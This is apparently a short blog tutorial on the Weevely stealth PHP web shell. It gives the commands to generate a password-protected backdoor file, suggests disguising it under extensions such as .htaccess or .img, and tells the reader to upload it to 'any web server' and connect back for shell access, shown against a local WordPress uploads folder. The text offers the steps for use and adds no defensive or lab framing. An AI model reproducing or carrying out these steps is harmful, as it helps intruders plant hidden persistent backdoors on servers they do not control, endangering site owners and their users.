Naresh LamGade
Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. You can Download weevely from : Weevely Download
First run Weevely.
First run Weevely.
Run the following command :
python weevely.py generate [PASSWORD] [location]/filename.php
For example :
python weevely.py generate nepal123 /home/lamgade/Desktop/uban.php
”nepal123″ is my password. “uban.php” is my filename. You can keep any filename.php. You can keep other extension like “.htaccess” , “.img”
Now “uban.php” is a backdoor.
Once you have generated the backdoor, upload your backdoor in any web server and just use the following command to back connect.
For example i have uploaded backdoor in my localhost. And here is the backdoor location.
http://localhost/wordpress/wp-content/uploads/2014/04/uban.php
And now my weevely command to back connect will be :
python weevely.py [URL OF THE BACKDOOR] [PASSWORD OF THE BACKDOOR]
python weevely.py http://localhost/wordpress/wpcontent/uploads/2014/04/uban.php nepal123
And when i connect it will give me the backdoor access.
Comments
Naresh LamGade